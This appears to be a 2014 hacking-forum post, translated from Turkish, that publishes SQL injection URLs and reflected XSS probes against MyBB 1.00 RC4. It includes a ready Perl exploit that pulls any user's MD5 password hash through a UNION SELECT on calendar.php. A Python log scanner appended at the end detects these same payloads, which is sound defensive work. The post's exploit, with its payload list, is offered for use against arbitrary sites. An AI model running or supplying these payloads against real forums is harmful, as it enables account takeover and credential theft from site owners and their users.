Topic: MyBB 1.00 RC4 Forum newreply.php?tid= CSRF and SQL Vulnerabilities
KingSkrupellos
Post: #1
MyBB 1.00 RC4 Forum newreply.php?tid= CSRF and SQL Vulnerabilities
01.10.2014 11:32
Code:
http://www.example.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/*
http://www.example.com/mybb/online.php?pidsql=)[sql_query]
http://www.example.com/mybb/memberlist.php?usersearch=%'[sql_query]
http://www.example.com/mybb/editpost.php?pid='[sql_query]
http://www.example.com/mybb/forumdisplay.php?fid='[sql_query]
http://www.example.com/mybb/newreply.php?tid='[sql_query]
http://www.example.com/mybb/search.php?action=results&sid='[sql_query]
http://www.example.com/mybb/showthread.php?tid='[sql_query]
http://www.example.com/mybb/showthread.php?pid='[sql_query]
http://www.example.com/mybb/usercp2.php?tid='[sql_query]
http://www.example.com/mybb/printthread.php?tid='[sql_query]
http://www.example.com/mybb/reputation.php?pid='[sql_query]
http://www.example.com/mybb/portal.php?action=do_login&username='[sql_query]
http://www.example.com/mybb/polls.php?action=newpoll&tid='[sql_query]
http://www.example.com/mybb/ratethread.php?tid='[sql_query]

http://www.example.com/mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&forums[0]=0&version=%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/misc.php?action=syndication&limit=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=1&datecut=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/forumdisplay.php?fid=2&page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&username=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/member.php?agree=I+Agree&email2=%22%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/memberlist.php?usersearch=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1&pid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/showthread.php?mode=linear&tid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://www.example.com/mybb/printthread.php?tid=1%3Cscript%3Ealert(document.cookie)%3C/script%3E

Source =>
Code:
http://www.securityfocus.com/bid/13827/exploit

Hello Cyberizm, I am KingSkrupellos. I wanted to say a little about the MyBB vulnerabilities, one of the versions I have been working on these days. Material on this is generally only available in English and you will not find it in Turkish; since we Turks mostly do not understand it, I frankly decided to explain it in Turkish. Anyway, let's begin.

A CSRF and SQL injection flaw has been identified on MyBB forum sites in newreply.php?tid= and in the calendar section. The vulnerability is an obvious road to a hack. The reason is actually the SQL and CSRF flaws in the files I listed above. For example, when you request http://www.HERHANGİBİRSİTE.com/mybb/calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/* you obtain the MD5 password of the administrator, who is the privileged user. You can get the patch from http://www.mybboard.com/.
Exploit Perl Code =>

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= KingSkrupellos Cyberizm.Org =\n";
print "\t===========================================\n\n";

# Two arguments: forum base URL and the numeric uid to look up.
if(!$ARGV[0] or !$ARGV[1]) {
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.HERHANGİBİRSİTE.com/mybb/ 1\n";
   exit(0);
}

# The calendar.php request from the list above, restricted to one uid.
$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
# Read the two injected columns back out of the rendered event page.
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
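As an added defender-side example (not part of the post and not MyBB code): a small Python scanner that parses combined-format web server log lines and flags requests to the MyBB scripts named in the payload list above whose parameters carry the UNION SELECT or <script> shapes shown there. The regexes and the three sample log lines are constructed here; only the script names come from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# MyBB entry points named in the post's payload list (drop the filter to scan every script).
MYBB_SCRIPTS = {
    "calendar.php", "online.php", "memberlist.php", "editpost.php", "forumdisplay.php", "newreply.php",
    "search.php", "showthread.php", "usercp2.php", "printthread.php", "reputation.php", "portal.php",
    "polls.php", "ratethread.php", "misc.php", "member.php",
}
# UNION SELECT, or a quote followed by a SQL comment closer (the "'.../*" shape in the post).
SQLI_RE = re.compile(r"union\s+select|'[^']*(?:--|/\*)", re.I)
# Script tag, javascript: URL or inline event handler (the alert(document.cookie) probes above).
XSS_RE = re.compile(r"<\s*script|javascript:|\bon[a-z]+\s*=", re.I)
# Combined log format request line (constructed regex; adjust for your server's LogFormat).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})')

def classify_request(path):
    # Returns [(script, param, kind)] for one request target; empty list when nothing matched.
    parts = urlsplit(path)
    script = parts.path.rsplit("/", 1)[-1]
    if script not in MYBB_SCRIPTS:
        return []
    findings = []
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl decoded once; decode again so a double-encoded quote (%2527) is caught too.
        value = unquote_plus(value)
        if SQLI_RE.search(value):
            findings.append((script, key, "sqli"))
        if XSS_RE.search(value):
            findings.append((script, key, "xss"))
    return findings

def scan_log(lines):
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        for script, param, kind in classify_request(m["path"]):
            alerts.append({"ip": m["ip"], "ts": m["ts"], "script": script,
                           "param": param, "kind": kind, "status": m["status"]})
    return alerts

# Constructed sample log: two probes matching the post's payloads, one benign request.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Oct/2014:11:32:07 +0300] "GET /mybb/calendar.php?action=event&eid=%27%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users/* HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Oct/2014:11:32:09 +0300] "GET /mybb/misc.php?action=syndication&forums[0]=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 812',
    '198.51.100.7 - - [01/Oct/2014:11:33:01 +0300] "GET /mybb/showthread.php?tid=1 HTTP/1.1" 200 9001',
]
```

Running scan_log(SAMPLE_LOG) yields one sqli alert for calendar.php eid and one xss alert for misc.php forums[0]; the benign showthread.php request produces nothing.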